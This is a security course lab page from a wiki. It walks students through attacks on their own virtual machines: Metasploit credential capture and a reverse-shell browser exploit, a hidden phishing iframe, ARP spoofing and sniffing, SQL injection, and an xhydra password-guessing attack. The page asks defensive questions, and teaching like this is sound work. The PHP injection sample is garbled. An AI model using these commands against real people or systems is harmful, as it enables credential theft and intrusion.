Open main menu

CDOT Wiki β

Changes

SEC520/labs/Lab 4

24,260 bytes added, 16:05, 31 January 2018
Created page with "<h1> <span class="mw-headline">Types of Attacks</span></h1> <h2> <span class="mw-headline">Introduction</span></h2> <br /> In the previous lab, you learned how to perform pen..."
<h1> <span class="mw-headline">Types of Attacks</span></h1>
<h2> <span class="mw-headline">Introduction</span></h2>
<br />
In the previous lab, you learned how to perform penetration testing on a vulnerable (target) server. You learned how to perform scanning and enumeration, and then ran vulnerability testing software (eg. Metasploit) to gain access to your Windows server. <br /><br />
In this lab, students will learn <b>other methods of vulnerability testing</b> to gain access to vulnerable servers:
<br /><br />
<dl><dd><ul><li>This lab will allow students to identify and practice common types of attacks that occur on targeted computer systems.
</li></ul>
</dd></dl>
<dl><dd><ul><li>First, students will be exposed to <b>Client-side</b> attacks (usually initiated by the server's users) including <b>Malicious web-page Payloads</b>, and <b>IP Spoofing</b> (Man in the Middle) attacks.
</li></ul>
</dd></dl>
<dl><dd><ul><li>Then, students will focus on <b>Server-side</b> attacks such as <b>Server-side Injection</b>, and <b>Password</b> attacks.
</li></ul>
</dd></dl>
<br><br>
<h2> <span class="mw-headline">Objectives</span></h2>
<ol><li>Access a server by creating a webpage using the <b>&lt;iframe&gt;</b> tag to redirect a user to a <b>Metasploit exploit</b> in order to gain access to the computer system.
</li><li>Understand how <b>phishing</b> can be used to have the user inadvertantly activate (trigger) HTML code to access a vulnerable server via a web-browser.
</li><li>Perform <b>IP Spoofing</b> (Man in the Middle) attacks in order to obtain useful information between a connect between computers.
</li><li>Access and manipulate a database server to gain access into the targeted server.
</li><li>Use a <b>password cracking program</b> to discover and access user accounts, and possibly root access.
</li></ol>
<p><br>
</p>
<h2> <span class="mw-headline">Required Materials (Bring to All Labs)</span></h2>
<ul>
<li> <b>SATA Hard Disk</b> (in removable disk tray).
</li><li> <b>Lab Logbook (Lab6 Reference Sheet)</b> (to make notes and observations).
</li></ul>
<p><br>
</p>
<h2> <span class="mw-headline">Prerequisites</span></h2>
<ul><li> [https://scs.senecac.on.ca/%7Efac/sec520/labs/SEC520_Lab_3.html SEC520 Lab 3]
</li></ul>
<p><br>
</p>
<h2> <span class="mw-headline">Online Tools and References</span></h2>

<ul>
<li>[http://www.ehacking.net/2011/10/metasploit-tutorials-from-beginner-to.html Metasploit Framework]</li>
<li>[http://linuxmanpages.com/man1/nmap.1.php nmap]</li>
<li>[http://www.irongeek.com/i.php?page=security/arpspoof arpspoof]</li>
<li>[http://arhodes505.awardspace.us/minituts/xhydra.htm xhydra]</li>
</ul>

<p><br>
</p>
<h2> <span class="mw-headline">Course Notes</span></h2>
<ul>
<li>[http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.odp odp] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.pdf pdf] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.ppt ppt] (Slides: Types of Attacks)</li>
<li>[http://www.youtube.com/watch?v=ZUygX8TBBw0 Phishing] | [http://www.youtube.com/watch?v=PqfZM3Lxrmg Malicious Payload] | [http://www.youtube.com/watch?v=-hd7XG-b6uk IP Spoofing] | [http://www.youtube.com/watch?v=AhTfo6pWBIM Database Injection] | [http://www.youtube.com/watch?v=Iyh_w0Ix2bc Cracking Weak Passwords] (YouTube Videos)</li>
<li>[http://libcat.senecac.on.ca/vwebv/holdingsInfo?searchId=89542&amp;recCount=50&amp;recPointer=0&amp;bibId=315433 Penetration Tester's Open Source Toolkit (E-book)] (Chapters 4, 5, 6)</li>

</ul>

<p><br>
</p>
<h1> <span class="mw-headline">Performing Lab 4</span></h1>
<br>
{{Admon/caution|CAUTION!|Scanning ports and exploiting servers must
require the permission of Server Owner (preferably in writing). Students
must either use their VMs, use the IFS lab (if available), or sign an agreement to use the <b>Tank</b> server when practising these computer system intrusion methods.|}}
<br>

<h2> <span class="mw-headline">Task #1: Web-browser Redirect (Phishing) Attacks</span></h2>
<br>
This section will demonstrate the vulnerability of a computer system
with one of its weakest links: <i>Humans</i>. You will be using the <b>Metasploit</b> framework to create an attack on your server that will <i>exploit</i> and <i>gain access</i> to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer.
<br>
INSTRUCTIONS:
<br /><br />
Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the <b>Armitage</b> frontend, other strategies such as <i>lurking</i> to gain access (via reverse shell) by redirecting web-browser traffic are also available.
<br /><br />
In this section, we will be using the mfs-console to issue commands to exploit via the web-browser. Before we start, we should update our Metasploit Framework. In order to achieve this, we will update the older version of Metasploit that came with our Kali Linux edition with a new version:
<br /><br />
{{Admon/tip|Using The MSF Console|
<b>msfconsole</b> is a shell that allows penetration testers to issue commands when working with Metasploit. For example, IFS students in the degree program are expected to perform penetration testing more in the msfconsole than using Metasploit GUIs like Armatage!<br /><br />
We will be running the <b>msfconsole</b> command to access the command shell, and setup a typical phishing attack.
|}}
<br />
<ol>
<li>Login as <b>root</b> user, and issue the command: <b>msfconsole</b> (ignore error, console should eventually load). If problems persist check to see if the Metasploit server is running.<br>
Next, we will be generating an attack payload (code) that can be executed from an html file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (html) file:
<br /></li>
<li>In the <b>msfconsole</b>, issue the following commands:
<br /><br />
</ol>
<pre style="font-family:courier;">
<b>use auxiliary/server/capture/http_basic
show options
set REALM Facebook Gateway
set URIPATH /
run</b>
</pre></br /></li>
<ol>
<li value="3">Note the <b>LOCAL IP ADDRESS</b>. You will be entering that address in a web-browser on your targeted Windows server.</li>
</li><li>Your attack server (running Metasploit) is now "lurking" until the user enters data in a windows dialog box.</li>
</ol>
{{Admon/important|Disable Internet Explorer Enhanced Security|
In order to demonstrate this attack, we will disable Internet Explorer Enhanced Security. Perform the instructions below to disable this feature.|}}
<br>

<ol>
<li value="5">Switch to your vulnerable Windows server, make certain that you are logged in as <b>Administrator</b>.</li>
<li>Open the <b>Control Panel</b>, select <b>Add or Remove Programs</b>, select <b>Add/Remove Windows Components</b>. Click to select <b>Internet Explorer Enhanced Security Configuration</b> and click <b>Details</b>. Unclick the checkboxes for admin and all other users and then click <b>Next</b>.</li>
<li>Login into a regular user account and open a web-browser.</li>
<li>Enter the IP ADDRESS for the attack web-site. Enter a username and password when prompted by the dialog box</li>
<li>Now, switch to your attack machine (i.e. host), and you should see a notification of the exploit. Where you able to determine the username and password?</li>
<li>Did you think it would be harder to exploit a machine in this way?</li>
<li>How popular do you think this type of human-based attack is?</li>
<li>How can you prevent this type of attack from occurring on a "hardened system"?</li>
<li>Record your findings in your lab log-book.</li>
</ol>
<br /><br />
{{Admon/tip|The Phishing Attack (For Interest Only)|
<br /><br /><b>WARNING! Only try this for penetration testing on your VMs or on servers that you have permission to perform penetration testing!</b><br /><br />Only You have created a mechanism to gain access to a vulnerable system by using the targeted system's web-browser. All the <b>penetration tester</b> needs to do, is to set an <b>elaborate "trap" to redirect the user to your host's IP_ADDRESS</b>, disguised as a regular link.<br /><br />
Here is how simple (subtle) it can be:<br /><br />
<ol>
<li>Perform a Google search to use msfconsole to setup a "reverse shell attack" by entering the console commands:<ul><li>use windows/browser/ms10_002_aurora</li><li>set generic/shell_reverse tcp</li><li>set LHOST (your attack host IP ADDRESS)</li><li>set URIPATH /</li><li>set LPORT 7371</li><li>set SRVPORT 80</li><li>exploit</li></ul></li><li>Create a "phony" facebook notification for the "targeted" user on the system (this is where the reconnaissance (information gathering) phase comes in handy such as e-mail usernames and facebook accounts.</li>
<li>Here is a link to sample HTML code: [https://scs.senecac.on.ca/%7Efac/sec520/labs/email-attachment-template.html.txt Template of e-mail attachment]</li>
<li>Edit the file to contain the following iframe (that will draw the user to your attack website):<br><br>
<pre> <b> &lt;iframe src="ATTACK_SERVER_IP_ADDRESS" width="100" height="0"&gt; &lt;/iframe&gt;</b>
</pre></li>
<li>We could then send this HTML file via an e-mail to the user (in this case masquerading as a facebook notification. You could simulate this attack for demonstration by creating the html file in your Windows server, and load this file with a web-browser (like Internet Explorer).<br /><br />Another approach would be to send a "phony" notification with links to the facebook "login" page with the &lt;iframe&gt; element.</li>
</ol>
|}}
<ol>
<br />
<li value="14">Proceed to Task #2</li>
</ol>
<p><b>Answer the Task #1 observations / questions in your lab log book.</b>
</p>
<br><br>
<h2> <span class="mw-headline">Task #2: IP Spoofing (Man in the Middle) Attacks / Packet Sniffing</span></h2>

<p><br>
This section will demonstrate an <b>IP Spoofing</b> attack (sometimes
referred to as <i>"arp poisoning"</i>) where the target server is "tricked"
into communicating with a server that assumes has the correct MAC
address. The attacker can then <b>"feed packets"</b> to the destination allowing for an uninterupted session to obtain information such as usernames and passwords.
<br><br>
INSTRUCTIONS:
</p><ol>
<li>We will be using your <b>Kali Linux</b> host machine, <b>Vulnerable Windows VM</b>, and <b>Vulnerable Linux VM</b> for this section.</li>
<li>Note the IP Address of your Windows server.
</li><li>Make certain that your Windows machine is running an FTP
server. Set up the FTP server to only allow users to access the FTP
server by username and password (possibly not required from default installation and startup).</li>
<li>For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: <b>ping LINUX_IP_ADDR -t</b><br /><br />You should now see proof of a connection between your vulnerable Windows and Linux servers.</li>
<li>Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.</li>
<li>Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: <b>ping WINDOWS_IP_ADDR</b></li>
<li>We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.</li>
<li>Switch to your Kali Linux (host) server, and open a shell terminal.</li>
<li>While in the host (attack) machine, issue the following Linux command:<br /><br /> <b>sudo arpspoof -t &nbsp;&nbsp; WINDOWS_IP_ADDR &nbsp;&nbsp; LINUX_IP_ADDR</b><br><br> </li>
<li>We need to continue the "man in the middle" attack by now
performing the same manuever for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following
Linux command: <br><br><b>sudo arpspoof -t &nbsp;&nbsp; LINUX_IP_ADDR_LINUX &nbsp;&nbsp; WINDOWS_IP_ADDR</b><br><br></li>
<li>Switch to first your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.<br /><br /></li>
</ol>

{{Admon/important|Connection Disconnected|When initionally performing an
"IP Spoof", the connection between the machines is temporary broken. In
order to re-establish a connection (via the "man in the middle") the attacker must establish <b>IP FORWARDING</b>.|}}
<br>
<ol>
<li value="12">To complete the "man in the middle" attack, you are required to establish <b>IP FORWARDING</b>. Open another shell window in your host (attack) machine, and issue the following Linux command in your attack host:<br><br><b>sudo su</b> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # login with admin passord<br /><b> echo 1 &gt; /proc/sys/net/ipv4/ip_forward</b><br><br>(This means to set IP FORWARDING to "True" or "On")<br><br></li>
<li>Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.<br /><br /></li>
</ol>
{{Admon/important|Obtaining Username / Password Information|One of the main
reasons for a <b>"man in the middle" attack</b> is to obtain sensitive
information such as a username and password for further exploitation. A <b>Packet Sniffer</b>
is a useful tool when using a "man in the middle attack". Throughout
your journey in the area of Internet Security, you will soon learn there
is an ambundence of tools, many of which do the same thing (including
packet sniffers). For the remainder of this section we will use a packet sniffer tool called <b>dsniff</b>.|}}
<br>
<ol>
<li value="14">On an available shell terminal on your host (attack) server, and issue the following Linux command: <b>dsniff</b><br />(<b>tip:</b> Use the command: <b>find -P . | grep dsniff</b> to locate dsniff superuser executable)</li>
<li>This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.</li>
<li>Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.</li>
</ol>
{{Admon/important|FTP Doesn't Work / Alternative Arp Posioning Method|
Students have noticed that when using Kali Linux as a host machine for the
vulnerable Windows and Linux VMs they experience a problem when using
the <b>arpspoof</b> command. You can use the <b>ettercap</b> command as an alternative command which does
not require port forwarding and performs the dsniff command as well.<br><br>
To run the ettercap command, issue the following command:
<b>ettercap -T -M arp /// /// -i vboxnet0</b><br>
|}}

<ol>
<li value="17">Then switch back to your host (attack) server.</li>
<li>What do you notice? Is this information sufficent to logon as a Windows system user? Record your findings in your lab log-book.</li>
<li>Return to your vulnerable Linux server, and close the FTP connection with the Windows server.</li>
<li>Switch back to your attack server. What information does <b>dsniff</b> provide?</li>
<li>What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?</li>
<li>Record your findings/answers in your lab log-book.</li>
<li>Proceed to Task #3</li>
</ol>

<p><b>Answer Task #2 observations / questions in your lab log book.</b>
</p><p><br>
</p>


<h2> <span class="mw-headline">Task #3: Database Injection Attack</span></h2>


<br>
<b>SQL injection attacks</b> are basically in the form of introducing or
"injecting" malicious code via the input (form) for the SQL/MYSQL
database, in order to gain access to the backend database. There are
many different methods of injection attacks. We will demonstrate a
fairly common method of injection attack which exploits a weakness for
the MYSQL server (that fail to <b>sanitize</b> user input. In this case, the user inserting illegal characters (single quote <b>i</b>) within an established web-based database form.
<br><br>
In this section, we will only <u>expose</u> the student to the concept of an injection attack. <b>You are <u>NOT</u> required to setup the MYSQL server, or run a SQL injection attack on your vulnerable machines...</b>
<br /><br />
INSTRUCTIONS:
<ol>
<li>Study the following PHP code below: </li>
</ol>
<pre> &lt;?php

$user = $_POST['usr'];

$user = "anything' OR x='x";

mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'");

?&gt;

</pre>
<br>

<ol>
<li value="2">How could this code be incorporated with an HTML document (using a form) to perform a <b>database injection</b> attack? Record your answer in your lab log-book.</li>
<li>View the associated <b>YouTube</b> video in the resources above, and try briefly explained why this type of attack could work. Write your explanation in your lab log-book.</li>
<li>Now, make the following editing changes to your saved database form (areas to be changed are displayed in bold, red colour:</li>
</ol>
<pre> &lt;?php

$user = <span style="color:red;font-weight:bold">mysql_real_escape_string(</span>$_POST['usr']<span style="color:red;font-weight:bold">)</span>;

$user = "anything' OR x='x";

mysql_query("SELECT user,password FROM users WHERE user ' 'anything' or x='x'");

?&gt;

</pre>
<ol>
<li value="5">Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.</li>
<li>Proceed to Task #4.</li>
</ol>

<p><b>Answer Task #3 observations / questions in your lab log book.</b>
</p><p><br>
</p>


<h2> <span class="mw-headline">Task #4: Password Cracking Attack</span></h2>


<br>
In this section, you will learn another technique to crack passwords by
obtaining <i>usernames</i> from e-mail addresses, and then running a <i>password
cracking program</i> to hopefully gain access to an account on a vulnerable Windows server that contains a weak password. Then, after gaining access to the account, we will then use a series of techniques to gain access to the
administrator's account.
<br><br>
INSTRUCTIONS:
<ol>
<li>Go to your vulnerable Windows server, create a username called <b>weak</b> that contains a very weak password (no special characters, just words that could be contained in a dictionary).</li>
<li>How could you obtain usernames (eg. e-mail usernames) for a targetted computer system? (review your labs and notes during the Reconnaissance Phase). Record your answer in your lab log-book.</li>
<li>Assuming that you have obtained a username (i.e. username: <b>weak</b>) from the reconnaissance phase. We will now be using a tool to gain access to the account on the targeted Windows server.<br /><br /></li>
</ol>
{{Admon/important|Cain Password Dictionary|A password cracking program requires a dictionary of common passwords. The file <b>cain.txt</b> is a popular dictionary of typical or common passwords that can be used to test for weak passwords on a server.|}}
<br>


<ol>
<li value="4">We need to download a dictionary file containing many of the weak password combinations to help crack a user's weak password. You can perform a Netsearch in order to save this dictionary as a text file.<br /><br />Here is a link to various password cracking dictionaries: [http://www.skullsecurity.org/wiki/index.php/Passwords http://www.skullsecurity.org/wiki/index.php/Passwords]<br /><br />As root, download the compressed file (cain.txt.bz2) to your <b>/root</b> directory.</b><br /><br /></li>
<li>Decompress the file by issuing the following Linux command: <b>bunzip2 cain.txt.bz2</b><br /><br /></li>
</ol>
{{Admon/important|xhydra|xhydra is a graphical frontend of a program
that scans open ports, and attempts to crack account passwords that are
weak using a dictionary file of potential passwords. Of course, you
could have performed this task manually by using <b>nmap</b> to scan open ports, and use other password cracking tools (such as <b>Cain and Able</b>), but <b>xhydra</b> performs these operations automatically.|}}
<br>

<ol>
<li value="6">To launch the xhydra application as root (unless you are already in root), issue the following Linux command: <b>sudo xhydra</b><br /><br /></li>
<li>In the initial application window (ie. <b>Target</b> tab), enter the <b>WINDOWS_IP_ADDR</b> in the <b>Target</b> textbox.</li>
<li>Under the <b>Protocol</b> list-box, select <b>ftp</b>.</li>
<li>In the <b>Output Options</b> section, check <b>Be verbose</b>, and check <b>Show Attempts</b>.</li>
<li>Move to the next screen by clicking on the <b>Passwords</b> tab.</li>
<li>In the <b>Username</b> section, type the username called <b>weak</b>.</li>
<li>In the <b>Password</b> section, click on the <b>passwords list</b> radio button, and then click on the <b>passwords list text-box</b> in order to browse to the <b>/root/cain.txt</b> dictionary (on your Kali Linux system) that contains common passwords that you downloaded and decompressed.</li>
<li>At the bottom of the screen, check <b>Try login as password</b>, and click <b>Try Empty Password</b>.</li>
<li>Click on the <b>Start</b> tab, and click on the <b>Start</b> button (at the bottom of the screen) to begin the attack.</li>
<li>This attack may take several minutes to complete.</li>
<li>Check the output from the Password Cracking Attempt. Did it list
any usernames and passwords? If so, record the information in your lab
log-book.<br><br></li>
</ol>
{{Admon/important|Gaining Root Access|Once a penetration tester has access to a system as an unpriviledged user, there are methods to try to identify and gain access to an administrative account.<br /><br />
For example with Linux systems, gaining access to the <b>/etc/passwd</b> file to list users with administrative privedges and gaining access to the <b>/etc/shadow</b> to attempt a crack the root password hash (via the <b>John the Ripper</b> utility).
|}}
<br>
<ol>
<li value="17">What sort of harm can be done to this organization if the <b>root</b> account has been hacked?</li>
<li>What sort of password rules should be used to make it harder to penetrate this system?</li>
</ol>
<br />
{{Admon/important|Sharpening Your Skills (hackthissite.org)|
If you are interested in practicing or "honing" your penetration skills, there is a site called [http://www.hackthissite.org/pages/index/index.php http://www.hackthissite.org] that allows students to play and practice their skills.<br /><br />
<b>WARNING:</b> You ARE <u>NOT SAFE</u> in leaving personal information on the site. The owner of this site has served jail-time for FRAUD. There is also the possibility that a member of the hacker community may be able to access your personal information and use it for their personal advantage (at your expense).
<br /><br />
You have been warned!
<br />
|}}
<br />
<ol>

<li value="19">Record your findings in your lab log-book.</li>
<li>Proceed to the "Completing the Lab".</li>
</ol>

<p><b>Answer Task #4 observations / questions in your lab log book.</b>
</p><p><br>
</p>

<h1> <span class="mw-headline"> Completing the Lab </span></h1>
<p><b>Arrange evidence for each of these items on your screen, then ask
your instructor to review them and sign off on the lab's completion:</b>
</p>
<ol>
<li>Proof of <b>Windows VM hack from Phishing / Malicious Code</b>.</li>
<li><b>Packet Sniffing</b> information from Linux to Windows FTP connection.</li>
<li>Demonstation of <b>prevention from Data Injection Attack</b>.</li>
<li>Completed Lab 4 notes.</li>
</ol>
<p><br>
</p>
<h1> <span class="mw-headline"> Preparing for Quizzes </span></h1>

<ol>
<li>Briefly explain the purpose of a <b>Phishing</b> Attack. How can phishing relate to using <b>malicious code</b>?</li>
<li>Define the term <b>Man in the Middle</b> attack.</li>
<li>Briefly list the steps in a <b>Database Injection</b> attack.</li>
<li>How can a <b>dictionary file</b> be used to crack passwords on a targeted server?</li>
<li>What is a <b>password hash</b>? How can a <i>password hash</i> be cracked?</li>
<li>What can an organization do to prevent passwords on their computer system from being cracked?</li>
</ol>